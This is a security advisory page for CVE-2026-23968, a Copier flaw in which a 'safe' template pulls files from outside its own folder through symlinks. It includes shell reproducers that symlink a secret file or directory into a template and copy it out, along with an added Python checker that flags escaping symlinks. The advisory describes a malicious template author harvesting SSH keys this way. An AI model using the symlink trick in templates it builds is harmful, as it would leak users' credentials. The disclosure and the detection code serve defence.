CVE-2026-23968

Severity: MEDIUM (5.5) | EPSS: 0.05%

Copier safe template has arbitrary filesystem read access via symlinks when _preserve_symlinks: false

Published: 1/21/2026 | Modified: 2/3/2026

Description

### Impact

Copier suggests that it's safe to generate a project from a safe template, i.e. one that doesn't use [unsafe](https://copier.readthedocs.io/en/stable/configuring/#unsafe) features like custom Jinja extensions which would require passing the `--UNSAFE`/`--trust` flag. As it turns out, a safe template can currently include arbitrary files/directories outside the local template clone location by using symlinks along with [`_preserve_symlinks: false`](https://copier.readthedocs.io/en/stable/configuring/#preserve_symlinks) (which is Copier's default setting). Imagine, e.g., a malicious template author who creates a template that reads SSH keys or other secrets from well-known locations and hopes for a user to push the generated project to a public location like [github.com](https://github.com/) where the template author can extract the secrets.

Reproducible example:

- Illegally include a file in the generated project via symlink resolution:

  ```shell
  echo "s3cr3t" > secret.txt
  mkdir src/
  pushd src/
  ln -s ../secret.txt stolen-secret.txt
  popd
  uvx copier copy src/ dst/
  cat dst/stolen-secret.txt
  # s3cr3t
  ```

- Illegally include a directory in the generated project via symlink resolution:

  ```shell
  mkdir secrets/
  pushd secrets/
  echo "s3cr3t" > secret.txt
  popd
  mkdir src/
  pushd src/
  ln -s ../secrets stolen-secrets
  popd
  uvx copier copy src/ dst/
  tree dst/
  # dst/
  # └── stolen-secrets
  #     └── secret.txt
  #
  # 1 directory, 1 file
  cat dst/stolen-secrets/secret.txt
  # s3cr3t
  ```

### Patches

n/a

### Workarounds

n/a

### References

n/a
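As a defensive pre-flight check added here (not part of Copier or of this advisory), the following script walks a template checkout and reports every symlink, file or directory, whose resolved target lies outside the template root, which is exactly what Copier would copy into the generated project under the default `_preserve_symlinks: false`. The function names and the constructed sample layout mirroring the reproducer above are assumptions.

```python
"""Pre-flight check for Copier templates: flag symlinks that escape the
template root.  Added example, not Copier's own code."""
import os
import tempfile
from pathlib import Path


def find_escaping_symlinks(template_root):
    """Return (relative_link_path, resolved_target) pairs for every symlink
    under template_root whose final target is outside template_root.
    Symlinks that stay inside the template are legitimate and ignored."""
    root = Path(template_root).resolve()
    escaping = []
    # followlinks=False: a directory symlink is reported once, never walked
    for dirpath, dirnames, filenames in os.walk(root, followlinks=False):
        for name in dirnames + filenames:
            path = Path(dirpath) / name
            if not path.is_symlink():
                continue
            target = path.resolve()  # follows link chains, normalises '..'
            try:
                target.relative_to(root)
            except ValueError:  # resolved target is not under the root
                escaping.append((str(path.relative_to(root)), str(target)))
    return escaping


def build_sample_template():
    """Constructed throwaway layout: a secret file and a secret directory
    outside the template, and a template that symlinks to both."""
    base = Path(tempfile.mkdtemp())
    (base / "secret.txt").write_text("s3cr3t\n")
    (base / "secrets").mkdir()
    (base / "secrets" / "secret.txt").write_text("s3cr3t\n")
    src = base / "src"
    src.mkdir()
    (src / "README.md").write_text("# harmless\n")
    os.symlink("../secret.txt", src / "stolen-secret.txt")   # escapes root
    os.symlink("../secrets", src / "stolen-secrets")         # escapes root
    os.symlink("README.md", src / "README-link.md")          # stays inside
    return src


if __name__ == "__main__":
    for rel, target in find_escaping_symlinks(build_sample_template()):
        print(f"REFUSE: {rel} -> {target}")
```

Running the check before `copier copy` on a template you did not author catches both reproducers above while leaving in-template links such as `README-link.md` untouched.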

Affected packages (1)

CVSS scores

| Source | Version | Severity | Vector |
| --- | --- | --- | --- |
| osv | CVSS 4.0 | | CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N |
| osv | CVSS 3.1 | MEDIUM 5.5 | CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N |

References (4)